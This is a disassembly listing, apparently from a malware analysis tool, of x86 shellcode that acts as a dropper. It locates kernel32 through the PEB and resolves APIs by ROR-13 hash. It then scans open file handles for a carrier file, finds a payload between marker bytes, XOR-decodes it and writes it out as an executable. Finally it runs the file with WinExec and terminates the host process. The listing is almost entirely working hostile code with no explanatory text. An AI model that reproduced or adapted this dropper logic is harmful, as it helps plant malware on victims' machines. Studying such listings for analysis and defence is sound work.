seg000:00400D74 mov eax, large fs:30h seg000:00400D7A mov eax, [eax+0Ch] seg000:00400D7D mov esi, [eax+1Ch] seg000:00400D80 lodsd seg000:00400D81 mov esi, [eax+8] seg000:00400D84 jmp loc_400FBD seg000:00400D89 seg000:00400D89 ; =============== S U B R O U T I N E ======================================= seg000:00400D89 seg000:00400D89 seg000:00400D89 sub_400D89 proc near ; CODE XREF: seg000:loc_400FBDp seg000:00400D89 pop eax seg000:00400D8A sub esp, 200h seg000:00400D90 mov edi, esp seg000:00400D92 mov [edi+8], esi seg000:00400D95 mov [edi+10h], eax seg000:00400D98 push dword ptr [edi+8] seg000:00400D9B push 0C0397ECh ; GlobalAlloc seg000:00400DA0 call LookupApi seg000:00400DA5 mov [edi+1Ch], eax seg000:00400DA8 push dword ptr [edi+8] seg000:00400DAB push 7CB922F6h ; GlobalFree seg000:00400DB0 call LookupApi seg000:00400DB5 mov [edi+20h], eax seg000:00400DB8 push dword ptr [edi+8] seg000:00400DBB push 7C0017A5h ; CreateFileA seg000:00400DC0 call LookupApi seg000:00400DC5 mov [edi+24h], eax seg000:00400DC8 push dword ptr [edi+8] seg000:00400DCB push 0FFD97FBh ; CloseHandle seg000:00400DD0 call LookupApi seg000:00400DD5 mov [edi+28h], eax seg000:00400DD8 push dword ptr [edi+8] seg000:00400DDB push 10FA6516h ; ReadFile seg000:00400DE0 call LookupApi seg000:00400DE5 mov [edi+2Ch], eax seg000:00400DE8 push dword ptr [edi+8] seg000:00400DEB push 0E80A791Fh ; WriteFile seg000:00400DF0 call LookupApi seg000:00400DF5 mov [edi+30h], eax seg000:00400DF8 push dword ptr [edi+8] seg000:00400DFB push 0C2FFB025h ; DeleteFileA seg000:00400E00 call LookupApi seg000:00400E05 mov [edi+34h], eax seg000:00400E08 push dword ptr [edi+8] seg000:00400E0B push 76DA08ACh ; SetFilePointer seg000:00400E10 call LookupApi seg000:00400E15 mov [edi+38h], eax seg000:00400E18 push dword ptr [edi+8] seg000:00400E1B push 0E8AFE98h ; WinExec seg000:00400E20 call LookupApi seg000:00400E25 mov [edi+3Ch], eax seg000:00400E28 push dword ptr [edi+8] seg000:00400E2B push 99EC8974h ; CopyFileW seg000:00400E30 call LookupApi seg000:00400E35 mov [edi+40h], eax seg000:00400E38 push dword ptr [edi+8] seg000:00400E3B push 78B5B983h ; TerminateProcess seg000:00400E40 call LookupApi seg000:00400E45 mov [edi+44h], eax seg000:00400E48 push dword ptr [edi+8] seg000:00400E4B push 0DF7D9BADh ; GetFileSize seg000:00400E50 call LookupApi seg000:00400E55 mov [edi+48h], eax seg000:00400E58 push dword ptr [edi+10h] seg000:00400E5B call dword ptr [edi+34h] ; DeleteFileA seg000:00400E5E xor esi, esi seg000:00400E60 seg000:00400E60 loc_400E60: ; CODE XREF: sub_400D89+E3j seg000:00400E60 ; sub_400D89+EAj ... seg000:00400E60 inc esi seg000:00400E61 lea eax, [edi+60h] seg000:00400E64 push eax seg000:00400E65 push esi seg000:00400E66 call dword ptr [edi+48h] ; GetFileSize seg000:00400E69 cmp eax, 0FFFFFFFFh seg000:00400E6C jz short loc_400E60 seg000:00400E6E cmp eax, 1000h seg000:00400E73 jbe short loc_400E60 seg000:00400E75 mov [edi+4], eax seg000:00400E78 mov [edi+60h], esi seg000:00400E7B push dword ptr [edi+4] seg000:00400E7E push 40h ; '@' seg000:00400E80 call dword ptr [edi+1Ch] ; GlobalAlloc seg000:00400E83 mov [edi+5Ch], eax seg000:00400E86 push 0 seg000:00400E88 push 0 seg000:00400E8A push 0 seg000:00400E8C push dword ptr [edi+60h] seg000:00400E8F call dword ptr [edi+38h] ; SetFilePointer seg000:00400E92 cmp eax, 0FFFFFFFFh seg000:00400E95 jz short loc_400EE2 seg000:00400E97 push 0 seg000:00400E99 lea ebx, [edi+70h] seg000:00400E9C push ebx seg000:00400E9D push dword ptr [edi+4] seg000:00400EA0 push dword ptr [edi+5Ch] seg000:00400EA3 push dword ptr [edi+60h] seg000:00400EA6 call dword ptr [edi+2Ch] ; ReadFile seg000:00400EA9 mov ecx, [edi+70h] seg000:00400EAC sub ecx, 10h seg000:00400EAF mov eax, [edi+5Ch] seg000:00400EB2 seg000:00400EB2 loc_400EB2: ; CODE XREF: sub_400D89:loc_400EC4j seg000:00400EB2 inc eax seg000:00400EB3 cmp dword ptr [eax], 685A2E46h seg000:00400EB9 jnz short loc_400EC4 seg000:00400EBB cmp dword ptr [eax+4], 19810623h seg000:00400EC2 jz short loc_400EC8 seg000:00400EC4 seg000:00400EC4 loc_400EC4: ; CODE XREF: sub_400D89+130j seg000:00400EC4 loop loc_400EB2 seg000:00400EC6 jmp short loc_400EE2 seg000:00400EC8 ; --------------------------------------------------------------------------- seg000:00400EC8 seg000:00400EC8 loc_400EC8: ; CODE XREF: sub_400D89+139j seg000:00400EC8 add eax, 8 seg000:00400ECB mov [edi+14h], eax seg000:00400ECE seg000:00400ECE loc_400ECE: ; CODE XREF: sub_400D89:loc_400EE0j seg000:00400ECE inc eax seg000:00400ECF cmp dword ptr [eax], 4B63754Ah seg000:00400ED5 jnz short loc_400EE0 seg000:00400ED7 cmp dword ptr [eax+4], 19830112h seg000:00400EDE jz short loc_400EEE seg000:00400EE0 seg000:00400EE0 loc_400EE0: ; CODE XREF: sub_400D89+14Cj seg000:00400EE0 loop loc_400ECE seg000:00400EE2 seg000:00400EE2 loc_400EE2: ; CODE XREF: sub_400D89+10Cj seg000:00400EE2 ; sub_400D89+13Dj seg000:00400EE2 push dword ptr [edi+5Ch] seg000:00400EE5 call dword ptr [edi+20h] seg000:00400EE8 jnz loc_400E60 seg000:00400EEE seg000:00400EEE loc_400EEE: ; CODE XREF: sub_400D89+155j seg000:00400EEE add eax, 8 seg000:00400EF1 mov [edi+18h], eax seg000:00400EF4 push 0 seg000:00400EF6 push 80h ; 'Ç' seg000:00400EFB push 2 seg000:00400EFD push 0 seg000:00400EFF push 0 seg000:00400F01 push 40000000h seg000:00400F06 push dword ptr [edi+10h] seg000:00400F09 call dword ptr [edi+24h] ; CreateFileA seg000:00400F0C mov [edi+64h], eax seg000:00400F0F mov dword ptr [edi+6Ch], 905A4Dh seg000:00400F16 push 0 seg000:00400F18 lea ebx, [edi+70h] seg000:00400F1B push ebx seg000:00400F1C push 4 seg000:00400F1E lea ebx, [edi+6Ch] seg000:00400F21 push ebx seg000:00400F22 push dword ptr [edi+64h] seg000:00400F25 call dword ptr [edi+30h] ; WriteFile seg000:00400F28 mov eax, [edi+18h] seg000:00400F2B sub eax, [edi+14h] seg000:00400F2E sub eax, 8 seg000:00400F31 mov ebx, [edi+14h] seg000:00400F34 seg000:00400F34 loc_400F34: ; CODE XREF: sub_400D89+1B2j seg000:00400F34 xor [ebx], al seg000:00400F36 inc ebx seg000:00400F37 dec eax seg000:00400F38 cmp eax, 0 seg000:00400F3B jnz short loc_400F34 seg000:00400F3D push 0 seg000:00400F3F lea ebx, [edi+70h] seg000:00400F42 push ebx seg000:00400F43 mov ebx, [edi+18h] seg000:00400F46 sub ebx, [edi+14h] seg000:00400F49 sub ebx, 8 seg000:00400F4C push ebx seg000:00400F4D push dword ptr [edi+14h] seg000:00400F50 push dword ptr [edi+64h] seg000:00400F53 call dword ptr [edi+30h] ; CloseHandle seg000:00400F56 push dword ptr [edi+64h] seg000:00400F59 call dword ptr [edi+28h] seg000:00400F5C push 0 seg000:00400F5E push dword ptr [edi+10h] seg000:00400F61 call dword ptr [edi+3Ch] ; WinExec seg000:00400F64 jmp short near ptr loc_400FCA+2 seg000:00400F64 sub_400D89 endp seg000:00400F64 seg000:00400F64 ; --------------------------------------------------------------------------- seg000:00400F66 db 90h ; É seg000:00400F67 db 90h ; É seg000:00400F68 db 90h ; É seg000:00400F69 seg000:00400F69 ; =============== S U B R O U T I N E ======================================= seg000:00400F69 seg000:00400F69 ; Attributes: bp-based frame seg000:00400F69 seg000:00400F69 LookupApi proc near ; CODE XREF: sub_400D89+17p seg000:00400F69 ; sub_400D89+27p ... seg000:00400F69 seg000:00400F69 arg_0 = dword ptr 8 seg000:00400F69 arg_4 = dword ptr 0Ch seg000:00400F69 seg000:00400F69 push ebp seg000:00400F6A mov ebp, esp seg000:00400F6C push edi seg000:00400F6D mov edi, [ebp+arg_0] seg000:00400F70 mov ebx, [ebp+arg_4] seg000:00400F73 push esi seg000:00400F74 mov esi, [ebx+3Ch] seg000:00400F77 mov esi, [esi+ebx+78h] seg000:00400F7B add esi, ebx seg000:00400F7D push esi seg000:00400F7E mov esi, [esi+20h] seg000:00400F81 add esi, ebx seg000:00400F83 xor ecx, ecx seg000:00400F85 dec ecx seg000:00400F86 seg000:00400F86 loc_400F86: ; CODE XREF: LookupApi+36j seg000:00400F86 inc ecx seg000:00400F87 lodsd seg000:00400F88 add eax, ebx seg000:00400F8A push esi seg000:00400F8B xor esi, esi seg000:00400F8D seg000:00400F8D loc_400F8D: ; CODE XREF: LookupApi+31j seg000:00400F8D movsx edx, byte ptr [eax] seg000:00400F90 cmp dh, dl seg000:00400F92 jz short loc_400F9C seg000:00400F94 ror esi, 0Dh seg000:00400F97 add esi, edx seg000:00400F99 inc eax seg000:00400F9A jmp short loc_400F8D seg000:00400F9C ; --------------------------------------------------------------------------- seg000:00400F9C seg000:00400F9C loc_400F9C: ; CODE XREF: LookupApi+29j seg000:00400F9C cmp edi, esi seg000:00400F9E pop esi seg000:00400F9F jnz short loc_400F86 seg000:00400FA1 pop edx seg000:00400FA2 mov ebp, ebx seg000:00400FA4 mov ebx, [edx+24h] seg000:00400FA7 add ebx, ebp seg000:00400FA9 mov cx, [ebx+ecx*2] seg000:00400FAD mov ebx, [edx+1Ch] seg000:00400FB0 add ebx, ebp seg000:00400FB2 mov eax, [ebx+ecx*4] seg000:00400FB5 add eax, ebp seg000:00400FB7 pop esi seg000:00400FB8 pop edi seg000:00400FB9 pop ebp seg000:00400FBA retn 8 seg000:00400FBA LookupApi endp seg000:00400FBA seg000:00400FBD ; --------------------------------------------------------------------------- seg000:00400FBD seg000:00400FBD loc_400FBD: ; CODE XREF: seg000:00400D84j seg000:00400FBD call sub_400D89 seg000:00400FC2 arpl [edx], di seg000:00400FC4 pop esp seg000:00400FC5 sub eax, 6578652Eh seg000:00400FCA seg000:00400FCA loc_400FCA: ; CODE XREF: sub_400D89+1DBj seg000:00400FCA add [eax-95FF96h], dl seg000:00400FD0 call dword ptr [edi+44h] ; TerminateProcess